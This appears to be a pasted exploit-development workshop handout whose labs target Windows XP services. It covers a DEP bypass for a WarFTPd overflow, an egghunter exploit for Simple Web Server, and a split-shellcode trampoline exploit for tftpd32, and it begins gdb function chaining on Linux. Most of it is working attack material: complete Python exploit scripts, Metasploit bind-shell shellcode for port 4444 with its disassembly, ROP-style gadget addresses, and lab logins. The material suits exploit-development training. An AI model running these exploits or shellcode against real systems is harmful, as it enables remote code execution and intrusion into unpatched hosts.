  998. -----------------------------------------------------------------------
  999.  
  1000.  
  1001.  
  1002. ###########################################
  1003. # Lab 1b: Stack Overflows with DEP Bypass #
  1004. ###########################################
  1005.  
  1006. Reboot your target host and choose the "2nd" option for DEP.
  1007.  
  1008.  
  1009.  
  1010.  
  1011. ---------------------------Type This-----------------------------------
  1012.  
  1013. c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
  1014.  
  1015. At WINDBG prompt
  1016. “r” to show registers or “alt+4”
  1017.  
  1018. dd esp
  1019.  
  1020.  
  1021.  
  1022.  
  1023. c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
  1024.  
  1025.  
  1026. At WINDBG prompt
  1027. “r” to show registers or “alt+4”
  1028. dd esp
  1029. -----------------------------------------------------------------------
  1030.  
  1031. Eip: 32714131
  1032. esp: affd58 (71413471)
  1033.  
  1034. Now we need to SSH into the StrategicSec Ubuntu host
  1035.  
  1036. ---------------------------Type This-----------------------------------
  1037.  
  1038. cd /home/strategicsec/toolz/metasploit/tools
  1039.  
  1040. ruby pattern_offset.rb 32714131
  1041. 485
  1042.  
  1043. ruby pattern_offset.rb 71413471
  1044. 493
  1045.  
  1046.  
  1047.  
  1048.  
  1049.  
  1050.  
  1051.  
  1052.  
  1053. cd /home/strategicsec/toolz/metasploit/tools
  1054.  
  1055. ruby pattern_offset.rb 32714131
  1056.  
  1057. cd /home/strategicsec/toolz/metasploit/
  1058.  
  1059. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  1060.  
  1061.  
  1062.  
  1063. c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
  1064.  
  1065. 0:003> dd eip
  1066. 0:003> dd esp
  1067.  
  1068. INT3s - GOOD!!!!!!!
  1069.  
  1070.  
  1071.  
  1072. c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
  1073.  
  1074. nc XPSP3-ED-Target-IP 4444
  1075. -----------------------------------------------------------------------
  1076.  
  1077.  
  1078. strategicsec....exploit no workie!!!!
  1079.  
  1080.  
  1081. Why????????? DEP!!!!!!!!!!!!!
  1082.  
  1083.  
  1084.  
  1085.  
  1086. Let's look through ole32.dll for the following instructions:
  1087.  
  1088. mov al,0x1
  1089. ret 0x4
  1090.  
  1091. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1092.  
  1093.  
  1094. ---------------------------Type This-----------------------------------
  1095.  
  1096. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  1097. -----------------------------------------------------------------------
  1098.  
  1099. [DLLs/xpsp3/ole32.dll]
  1100. 0x775ee00e b001c204
  1101. 0x775ee00e mov al, 1
  1102. 0x775ee010 ret 4
  1103.  
  1104.  
  1105. Then we need to jump to the LdrpCheckNXCompatibility routine in
  1106. ntdll.dll that disables DEP.
  1107.  
  1108.  
  1109.  
  1110. Inside of ntdll.dll we need to find the following instructions:
  1111.  
  1112. CMP AL,1
  1113. PUSH 2
  1114. POP ESI
  1115. JE ntdll.7
  1116.  
  1117.  
  1118. ---------------------------Type This-----------------------------------
  1119.  
  1120. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  1121. -----------------------------------------------------------------------
  1122.  
  1123. [DLLs/xpsp3/ntdll.dll]
  1124. 0x7c91cd24 3c016a025e0f84
  1125. 0x7c91cd24 cmp al, 1
  1126. 0x7c91cd26 push 2
  1127. 0x7c91cd28 pop esi
  1128. 0x7c91cd29 jz 7
  1129.  
  1130.  
  1131. This set of instructions makes sure that AL is set to 1, 2 is pushed
  1132. on the stack then popped into ESI.
  1133.  
  1134.  
  1135.  
  1136.  
  1137. ---------------------------Type This-----------------------------------
  1138.  
  1139. dep = "\x0e\xe0\x5e\x77"+\
  1140. "\xff\xff\xff\xff"+\
  1141. "\x24\xcd\x91\x7c"+\
  1142. "\xff\xff\xff\xff"+\
  1143. "A"*0x54
  1144.  
  1145.  
  1146.  
  1147.  
  1148. c:\python27\python.exe warftpd5.py XPSP3-ED-Target-IP
  1149.  
  1150. nc XPSP3-ED-Target-IP 4444
  1151. -----------------------------------------------------------------------
  1152.  
  1153.  
  1154. ########################################
  1155. # Lab 2a: Not Enough Space (Egghunter) #
  1156. ########################################
  1157.  
  1158. -----------------------------------------------------------------------
  1159.  
  1160. SWS - SIMPLE WEB SERVER
  1161. -----------------------
  1162.  
  1163. Running SWS on Strategicsec-XP-ED-Target-VM
  1164. Start > Programs > Simple Web Server (it's in the middle somewhere)
  1165. Red icon in system tray
  1166. Double click it
  1167. - it will pop up a menu
  1168. - select "start"
  1169. - dialog box shows starting params - port 82
  1170.  
  1171. WinDBG
  1172. - attach to "server.exe"
  1173.  
  1174. ---------------------------Type This-----------------------------------
  1175.  
  1176. c:\python27\python.exe sws1.py XPSP3-ED-Target-IP
  1177.  
  1178. 0:003> dd eip
  1179. 0:003> dd esp
  1180.  
  1181. c:\python27\python.exe sws2.py XPSP3-ED-Target-IP
  1182.  
  1183. 0:003> dd eip
  1184. 0:003> dd esp
  1185.  
  1186. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  1187. cd /home/strategicsec/toolz/metasploit/tools
  1188. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  1189. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  1190.  
  1191. -----------------------------------------------------------------------
  1192.  
  1193.  
  1194.  
  1195.  
  1196.  
  1197.  
  1198.  
  1199. EGGHUNTER:
  1200. ----------
  1201.  
  1202. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1203. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1204. ^^^^^^^^^^^^^^^^
  1205. ABBA
  1206. JMP ESP
  1207. /
  1208. /
  1209. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  1210. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  1211.  
  1212.  
  1213.  
  1214.  
  1215. -----sws3.py-----
  1216. #!/usr/bin/python2
  1217. import os
  1218. import sys
  1219. import socket
  1220. import struct # for pack function
  1221.  
  1222. if len(sys.argv) < 2:
  1223. sys.stderr.write("Usage: sws3.py <host>\n")
  1224. sys.exit(1)
  1225.  
  1226.  
  1227. target = sys.argv[1]
  1228. port = 82
  1229.  
  1230.  
  1231. pad = "A" * 225 # distance to EIP
  1232. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  1233.  
  1234. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1235. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1236.  
  1237. shellcode = "\xCC" * 700
  1238.  
  1239. buf = "GET /"
  1240. buf += pad + struct.pack('<I', eip) + egghunter
  1241. buf += " HTTP/1.0\r\n"
  1242. buf += "User-Agent: ABBAABBA"
  1243. buf += shellcode
  1244. buf += " HTTP/1.0\r\n"
  1245.  
  1246. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # for TCP
  1247. # s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for UDP
  1248.  
  1249. try:
  1250. s.connect((target, port))
  1251. s.sendall(buf)
  1252. except Exception as e:
  1253. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  1254. finally:
  1255. s.close()
  1256. sys.stderr.write("Sent.\n")
  1257. -----
  1258.  
  1259. ############################################
  1260. # Lab 2b: Not Enough Space (Negative Jump) #
  1261. ############################################
  1262.  
  1263.  
  1264.  
  1265. -----------------------------------------------------------------------
  1266.  
  1267. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  1268.  
  1269. ^
  1270. 1 ----------------------1 overflow the buffer---------------------------|
  1271.  
  1272. ^ ^
  1273. |
  1274. 2 ----jump over seh record---|
  1275.  
  1276. ^ ^
  1277. |
  1278. 3--POP 2 words off stack---|
  1279.  
  1280. ^
  1281. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
  1282.  
  1283.  
  1284. #########################################
  1285. # Lab 2c: Not Enough Space (Trampoline) #
  1286. #########################################
  1287.  
  1288. ---------------------------Type This-----------------------------------
  1289.  
  1290. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  1291. -----------------------------------------------------------------------
  1292.  
  1293.  
  1294. On the Strategicsec-XP-ED-Target-VM VM
  1295.  
  1296. - open a command prompt
  1297. - c:\software\tftpd32
  1298. - run tftpd32.exe
  1299. - UDP port 69
  1300. (socket code is already in the scripts)
  1301.  
  1302.  
  1303.  
  1304.  
  1305. On your attack host please install:
  1306.  
  1307.  
  1308. NASM - Netwide Assembler
  1309.  
  1310.  
  1311.  
  1312.  
  1313.  
  1314. -----------------------------------------------------------------------------------------------------------------
  1315.  
  1316.  
  1317. We want to generate the shellcode (BIND SHELL on Port 4444)
  1318. - No restricted characters
  1319. - Encoder: NONE
  1320.  
  1321. Create a Python file called dumpshellcode.py
  1322.  
  1323. ---
  1324. #!/usr/bin/python2
  1325.  
  1326. import os
  1327. import sys
  1328. import struct
  1329.  
  1330.  
  1331. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  1332. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  1333. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  1334. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  1335. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  1336. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  1337. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  1338. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  1339. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  1340. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  1341. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  1342. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  1343. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  1344. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  1345. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  1346. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  1347. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  1348. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  1349. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  1350. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  1351. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  1352.  
  1353. sys.stdout.write(shellcode)
  1354. ---
  1355.  
  1356.  
  1357.  
  1358. python dumpshell.py > bindshell.bin
  1359.  
  1360. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
  1361.  
  1362.  
  1363.  
  1364. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  1365. 317 bindshell.bin
  1366.  
  1367. ---------------------------Type This-----------------------------------
  1368.  
  1369. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  1370. -----------------------------------------------------------------------
  1371.  
  1372. 00000000 FC cld
  1373. 00000001 6AEB push byte -0x15
  1374. 00000003 4D dec ebp
  1375. 00000004 E8F9FFFFFF call dword 0x2
  1376. 00000009 60 pushad
  1377. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  1378. 0000000E 8B453C mov eax,[ebp+0x3c]
  1379. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  1380. 00000015 01EF add edi,ebp
  1381. 00000017 8B4F18 mov ecx,[edi+0x18]
  1382. 0000001A 8B5F20 mov ebx,[edi+0x20]
  1383. 0000001D 01EB add ebx,ebp
  1384. 0000001F 49 dec ecx
  1385. 00000020 8B348B mov esi,[ebx+ecx*4]
  1386. 00000023 01EE add esi,ebp
  1387. 00000025 31C0 xor eax,eax
  1388. 00000027 99 cdq
  1389. 00000028 AC lodsb
  1390. 00000029 84C0 test al,al
  1391. 0000002B 7407 jz 0x34
  1392. 0000002D C1CA0D ror edx,0xd
  1393. 00000030 01C2 add edx,eax
  1394. 00000032 EBF4 jmp short 0x28
  1395. 00000034 3B542428 cmp edx,[esp+0x28]
  1396. 00000038 75E5 jnz 0x1f
  1397. 0000003A 8B5F24 mov ebx,[edi+0x24]
  1398. 0000003D 01EB add ebx,ebp
  1399. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  1400. 00000043 8B5F1C mov ebx,[edi+0x1c]
  1401. 00000046 01EB add ebx,ebp
  1402. 00000048 032C8B add ebp,[ebx+ecx*4]
  1403. 0000004B 896C241C mov [esp+0x1c],ebp
  1404. 0000004F 61 popad
  1405. 00000050 C3 ret
  1406. 00000051 31DB xor ebx,ebx
  1407. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  1408. 00000057 8B400C mov eax,[eax+0xc]
  1409. 0000005A 8B701C mov esi,[eax+0x1c]
  1410. 0000005D AD lodsd
  1411. 0000005E 8B4008 mov eax,[eax+0x8]
  1412. 00000061 5E pop esi
  1413. 00000062 688E4E0EEC push dword 0xec0e4e8e
  1414. 00000067 50 push eax
  1415. 00000068 FFD6 call esi
  1416. 0000006A 6653 push bx
  1417. 0000006C 66683332 push word 0x3233
  1418. 00000070 687773325F push dword 0x5f327377
  1419. 00000075 54 push esp
  1420. 00000076 FFD0 call eax
  1421. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  1422. 0000007D 50 push eax
  1423. 0000007E FFD6 call esi PART 1
  1424. 00000080 5F pop edi
  1425. 00000081 89E5 mov ebp,esp
  1426. 00000083 6681ED0802 sub bp,0x208
  1427. 00000088 55 push ebp
  1428. 00000089 6A02 push byte +0x2
  1429. 0000008B FFD0 call eax
  1430. 0000008D 68D909F5AD push dword 0xadf509d9
  1431. 00000092 57 push edi
  1432. 00000093 FFD6 call esi
  1433. 00000095 53 push ebx
  1434. 00000096 53 push ebx
  1435. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  1436. 00000097 53 push ebx
  1437. 00000098 53 push ebx
  1438. 00000099 53 push ebx
  1439. 0000009A 43 inc ebx
  1440. 0000009B 53 push ebx
  1441. 0000009C 43 inc ebx
  1442. 0000009D 53 push ebx PART 2
  1443. 0000009E FFD0 call eax
  1444. 000000A0 6668115C push word 0x5c11
  1445. 000000A4 6653 push bx
  1446. 000000A6 89E1 mov ecx,esp
  1447. 000000A8 95 xchg eax,ebp
  1448. 000000A9 68A41A70C7 push dword 0xc7701aa4
  1449. 000000AE 57 push edi
  1450. 000000AF FFD6 call esi
  1451. 000000B1 6A10 push byte +0x10
  1452. 000000B3 51 push ecx
  1453. 000000B4 55 push ebp
  1454. 000000B5 FFD0 call eax
  1455. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  1456. 000000BC 57 push edi
  1457. 000000BD FFD6 call esi
  1458. 000000BF 53 push ebx
  1459. 000000C0 55 push ebp
  1460. 000000C1 FFD0 call eax
  1461. 000000C3 68E5498649 push dword 0x498649e5
  1462. 000000C8 57 push edi
  1463. 000000C9 FFD6 call esi
  1464. 000000CB 50 push eax
  1465. 000000CC 54 push esp
  1466. 000000CD 54 push esp
  1467. 000000CE 55 push ebp
  1468. 000000CF FFD0 call eax
  1469. 000000D1 93 xchg eax,ebx
  1470. 000000D2 68E779C679 push dword 0x79c679e7
  1471. 000000D7 57 push edi
  1472. 000000D8 FFD6 call esi
  1473. 000000DA 55 push ebp
  1474. 000000DB FFD0 call eax
  1475. 000000DD 666A64 push word 0x64
  1476. 000000E0 6668636D push word 0x6d63
  1477. 000000E4 89E5 mov ebp,esp
  1478. 000000E6 6A50 push byte +0x50
  1479. 000000E8 59 pop ecx
  1480. 000000E9 29CC sub esp,ecx
  1481. 000000EB 89E7 mov edi,esp
  1482. 000000ED 6A44 push byte +0x44
  1483. 000000EF 89E2 mov edx,esp
  1484. 000000F1 31C0 xor eax,eax
  1485. 000000F3 F3AA rep stosb
  1486. 000000F5 FE422D inc byte [edx+0x2d]
  1487. 000000F8 FE422C inc byte [edx+0x2c]
  1488. 000000FB 93 xchg eax,ebx
  1489. 000000FC 8D7A38 lea edi,[edx+0x38]
  1490. 000000FF AB stosd
  1491. 00000100 AB stosd
  1492. 00000101 AB stosd
  1493. 00000102 6872FEB316 push dword 0x16b3fe72
  1494. 00000107 FF7544 push dword [ebp+0x44]
  1495. 0000010A FFD6 call esi
  1496. 0000010C 5B pop ebx
  1497. 0000010D 57 push edi
  1498. 0000010E 52 push edx
  1499. 0000010F 51 push ecx
  1500. 00000110 51 push ecx
  1501. 00000111 51 push ecx
  1502. 00000112 6A01 push byte +0x1
  1503. 00000114 51 push ecx
  1504. 00000115 51 push ecx
  1505. 00000116 55 push ebp
  1506. 00000117 51 push ecx
  1507. 00000118 FFD0 call eax
  1508. 0000011A 68ADD905CE push dword 0xce05d9ad
  1509. 0000011F 53 push ebx
  1510. 00000120 FFD6 call esi
  1511. 00000122 6AFF push byte -0x1
  1512. 00000124 FF37 push dword [edi]
  1513. 00000126 FFD0 call eax
  1514. 00000128 8B57FC mov edx,[edi-0x4]
  1515. 0000012B 83C464 add esp,byte +0x64
  1516. 0000012E FFD6 call esi
  1517. 00000130 52 push edx
  1518. 00000131 FFD0 call eax
  1519. 00000133 68F08A045F push dword 0x5f048af0
  1520. 00000138 53 push ebx
  1521. 00000139 FFD6 call esi
  1522. 0000013B FFD0 call eax
  1523.  
  1524.  
  1525.  
  1526.  
  1527. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  1528. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  1529. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  1530. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  1531. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  1532. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  1533. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  1534. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  1535. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  1536. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  1537.  
  1538.  
  1539. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  1540. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  1541. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  1542. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  1543. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  1544. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  1545. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  1546. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  1547. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  1548. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  1549. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  1550.  
  1551.  
  1552. STACK SHIFTER:
  1553. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  1554. prepend += "\x44" # inc esp
  1555.  
  1556.  
  1557.  
  1558.  
  1559.  
  1560.  
  1561.  
  1562.  
  1563.  
  1564.  
  1565.  
  1566.  
  1567.  
  1568.  
  1569. ---- final script ----
  1570.  
  1571. #!/usr/bin/python2
  1572. #TFTP Server remote Buffer Overflow
  1573.  
  1574. import sys
  1575. import socket
  1576. import struct
  1577.  
  1578. if len(sys.argv) < 2:
  1579. sys.stderr.write("Usage: tftpd.py <host>\n")
  1580. sys.exit(1)
  1581.  
  1582. target = sys.argv[1]
  1583. port = 69
  1584.  
  1585. eip = 0x7e429353 # jmp esp in USER32.DLL
  1586.  
  1587. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  1588. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  1589. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  1590. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  1591. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  1592. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  1593. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  1594. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  1595. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  1596. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  1597.  
  1598. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  1599. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  1600. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  1601. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  1602. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  1603. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  1604. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  1605. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  1606. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  1607. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  1608. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  1609.  
  1610. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  1611. prepend += "\x44" # inc esp
  1612.  
  1613. buf = "\x00\x01" # receive command
  1614.  
  1615. buf += "\x90" * (256 - len(part2)) # NOPs
  1616. buf += part2 # shellcode part 2
  1617. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  1618. buf += prepend # stack shifter
  1619. buf += part1 # shellcode part 1
  1620. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  1621. buf += "\x00" # END
  1622.  
  1623. # print buf
  1624.  
  1625. # buf = "\x00\x01" # receive command
  1626.  
  1627. # buf += "A" * 300 + "\x00"
  1628.  
  1629. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1630.  
  1631. try:
  1632. sock.connect((target, port))
  1633. sock.sendall(buf)
  1634. except Exception as e:
  1635. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  1636. finally:
  1637. sock.close()
  1638. sys.stderr.write("Sent.\n")
  1639.  
  1640.  
  1641.  
  1642. -----------------------------------------------------------------------------------------------------------------
  1643.  
  1644.  
  1645.  
  1646.  
  1647. How does all of this actually work
  1648.  
  1649.  
  1650.  
  1651.  
  1652. Total shellcode length: 315
  1653.  
  1654. Part1: 150
  1655. Part2: 165
  1656.  
  1657.  
  1658. NOPS * (256 - 165)
  1659.  
  1660. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  1661. | | |
  1662. 256 260 150 (410) |
  1663. |<------------------------------------------------------------------------------------------------------------|
  1664. Jump to the
  1665. 30 byte mark
  1666.  
  1667.  
  1668.  
  1669.  
  1670.  
  1671. =================================================================================
  1672.  
  1673.  
  1674. ##############################
  1675. # Intro to function chaining #
  1676. ##############################
  1677. ssh into 192.168.1.117
  1678. username: exploitlab
  1679. password: exploitlab
  1680.  
  1681.  
  1682. ---------------------------Type This-----------------------------------
  1683. cd /home/exploitlab
  1684. cat victim2.c
  1685. make victim2
  1686. ./victim2 AAAAAAAAAAAAA
  1687. -----------------------------------------------------------------------
  1688.  
  1689.  
  1690.  
  1691. ---------------------------Type This-----------------------------------
  1692. gdb victim2
  1693. disassemble main
  1694.  
  1695. break *0x080483cb
  1696.  
  1697. run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  1698. -----------------------------------------------------------------------
  1699.  
  1700.  
  1701. ---------------------------Type This-----------------------------------
  1702. bt
  1703. x/i $eip
  1704. x/64x $esp
  1705.  
  1706.  
  1707. quit
  1708. -----------------------------------------------------------------------
  1709.  
  1710.  
  1711.  
  1712.  
  1713. ---------------------------Type This-----------------------------------
  1714. cat frame1.pl
  1715. export EGG=`./frame1.pl`
  1716. gdb victim2
  1717. (gdb) run $EGG
  1718. -----------------------------------------------------------------------
  1719.  
  1720.  
  1721.  
  1722.  
  1723.  
  1724. x/100i 0x80484a5 (looking for a pop/pop/ret)
  1725. quit
  1726. cat frame2.pl
  1727. export EGG=`./frame2.pl`
  1728. gdb victim2
  1729. run $EGG
  1730.  
  1731.  
  1732. stepi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement